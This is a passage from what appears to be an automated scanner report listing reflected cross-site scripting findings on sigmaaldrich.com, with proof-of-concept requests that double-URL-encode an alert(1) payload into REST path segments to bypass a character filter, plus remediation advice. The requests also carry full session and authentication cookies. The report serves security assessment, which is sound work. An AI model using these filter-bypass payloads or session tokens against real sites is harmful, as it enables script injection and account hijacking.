Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:08 GMT
Content-Length: 28970
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/custom-oligosa731c";alert(1)//e03672b8d7c","E404") ;
   </script>
...[SNIP]...

1.109. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9bce0%2522%253balert%25281%2529%252f%252f5946943de71 was submitted in the REST URL parameter 1. This input was echoed as 9bce0";alert(1)//5946943de71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content9bce0%2522%253balert%25281%2529%252f%252f5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content9bce0";alert(1)//5946943de71/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.110. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1 was submitted in the REST URL parameter 2. This input was echoed as 63598";alert(1)//06fd2fe8eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich63598%2522%253balert%25281%2529%252f%252f06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:59 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich63598";alert(1)//06fd2fe8eb1/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.111. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa was submitted in the REST URL parameter 3. This input was echoed as 3b534";alert(1)//0dadcd087aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest3b534%2522%253balert%25281%2529%252f%252f0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:01 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest3b534";alert(1)//0dadcd087aa/life-science/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.112. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66369%2522%253balert%25281%2529%252f%252f24dc9edba80 was submitted in the REST URL parameter 4. This input was echoed as 66369";alert(1)//24dc9edba80 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science66369%2522%253balert%25281%2529%252f%252f24dc9edba80/functional-genomics-and-rnai/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 29007
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science66369";alert(1)//24dc9edba80/functional-genomics-and-rnai/shrna/custom-services","E404") ;
   </script>
...[SNIP]...

1.113. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai/shrna/custom-services

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9 was submitted in the REST URL parameter 5. This input was echoed as 194be";alert(1)//42d1ed28fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/functional-genomics-and-rnai194be%2522%253balert%25281%2529%252f%252f42d1ed28fc9/shrna/custom-services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
